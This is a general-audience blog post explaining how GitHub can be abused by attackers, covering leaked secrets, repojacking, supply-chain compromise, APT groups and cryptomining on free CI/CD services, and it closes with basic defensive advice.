GitHub — Through the Eyes of IT Cops
What is GitHub?
GitHub is a web-based platform that helps developers store and manage their code repositories. It also provides a range of features that make it easier for developers to collaborate on projects, including the ability to track issues and submit changes to code. In addition to hosting code, GitHub also provides tools for project management and documentation, and it is a popular platform for open-source projects.
Who are IT cops?
We all know who cops or police are, right? It is a constituted body of personnel empowered by a state, with the aim of enforcing the law, ensuring citizens’ safety, health and possessions, and preventing crime and civil disorder. So, who are IT cops then? They do the same in the domain of IT, and professionally, they are known as cyber security experts. Defending computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks is what they do. Be it networking, be it DevOps, be it cloud, be it software development, anywhere and everywhere, there is the aspect of security involved. Whenever you join a company, the cyber security experts of the company make sure to keep an eye on you to track whether you are doing what you are supposed to do and not anything you aren’t.
So if the Cyber security experts are cops, who are the criminals? Hackers! who, too are highly intelligent developers but with venom inserted. Yes! you heard it right, they are developers too and fittingly they love GitHub as all the developers do. If there are all the codes available in a platform and if they are open too, wouldn’t they? Also have you ever wondered who the other guy contributing to your open-source project is? Most of the time, you don’t know who they are, where they are from, or what they look like, but you work along with them. Can’t it be a hacker?
You know what, There’s no status as you are safe on the internet. Either you are breached or in the process of getting breached/compromised. Hackers break into your system for various motives. The most prominent one is the money motive, but there are other motives as well, like cyberwarfare- launching attacks to hack digital systems belonging to the opposite party.
Ok, Now let’s take a look at some examples of how GitHub becomes a gateway for cyber attacks.
- GitHub & Code vulnerabilities
Have you ever wondered whether our code is secure before uploading it or presenting it? There could be a lot of vulnerabilities in our code itself. Vulnerabilities are not bugs. A bug is when the system isn’t behaving as it’s supposed to, whereas a vulnerability is a bug that manifests itself as an opportunity for exploitation. Humans being the weakest link in cyber security, are negligent and upload sensitive data like the following to GitHub, which is exploited briskly by hackers.
- Passwords
- Tokens
- API keys
- IP information
- Sensitive domains, infrastructure details
- AWS, GCP, Azure Keys, and other secrets
Also, like any product, Zero-day vulnerabilities could be in GitHub, too — that is, the vulnerabilities that are yet to be identified by the developers of the product. This weakness could be exploited by hackers. As in the below-attached article, the vulnerability is called repojacking(repository + hijacking). This vulnerability allowed anyone to create a new repository with a previously used username, provided it is renamed. The GitHub repository URL contains the username and repository name, meaning if the URL of a repository with malicious code matches that of a pre-existing but renamed username, all traffic will be redirected to this repository instead of the renamed one.
- GitHub Supply chain attacks
Most of the companies have their code on GitHub. What if an attacker could come and add malicious code to it? What if another company uses this code for their project? Now the malicious code is brought into the supply chain. That’s where supply chain attacks are brought into the picture.
- Hosting malware on GitHub — Hackers develop malware and push it to your repo as a collaborator contributing to your project, pretending to be fixing the issues you have in your code.
- Hacking groups using GitHub
Also known as APT (Advanced Persistent Threats) groups, they possess extraordinary skills and resources — enabling them to infiltrate and exfiltrate an organization’s network. APTs use a variety of techniques, tactics, and tools — such as highly-targeted social engineering attacks, ransomware, vulnerability exploits, and zero-days to achieve their illicit objectives. They often attempt to gain undetected access to a network and then remain silently persistent, establish a backdoor, and/or steal data rather than causing damage. There are various such groups as Leviathon, LazyScripter, Lazarus, etc. There are reported incidents of hacking the specialized tools built by cyber security organizations and using the tools to hack other organizations.
- Abusing cloud computing resources, crypto mining using GitHub
The threat actor uses automated campaigns to create new accounts on the platforms and run cryptocurrency miners in containers by abusing continuous integration and deployment (CI/CD) service providers like GitHub(GitHub actions), Heroku, Buddy.works, and Togglebox. They engage in “free jacking,” trying to take advantage of whatever resources are offered to users of free accounts in an effort to increase their profits. Play and Run is a term used to describe threat actors who use paid resources, in this case, crypto mining, for financial gain and then refuse to pay their debts until their accounts are frozen. They leave them at that point and move on.
What we could do to prevent this?
As I mentioned before, human is the weakest link in cybersecurity. If we act carefully, expecting a breach anytime, most of the problems could be solved. Having proper awareness about cyber security, securing login credentials of GitHub accounts, implementing multi-factor authentications, securing the repositories, using code scanning techniques(GitHub security) before commits, using code signing, not exposing sensitive data in public repositories, monitoring GitHub for suspicious activity would help in eradicating cyber threats to a greater extent.
Sounds scary? That’s exactly why cybersecurity has high demand in the world currently. With the drastic increase in digitalization, the need for security to protect the data has become a top priority for every organization and individual. It isn’t quite easy to find the right set of people with the right amount of skills as well. Since GitHub is a productive tool despite its vulnerabilities due to human negligence, Cyber security experts use it constructively to handle cyber threats by sharing threat intelligence(How an attacker can attack your networks? Who is it, what is his IP address? what files are used?), collaborating on building tools for detection and prevention, sharing threat hunting queries, documenting SIEM(Security Information and Event Management) implementations and rules. phew! How versatile is this masterpiece— GitHub!
Connect with me on Medium, LinkedIn, Twitter, and Instagram for more content.
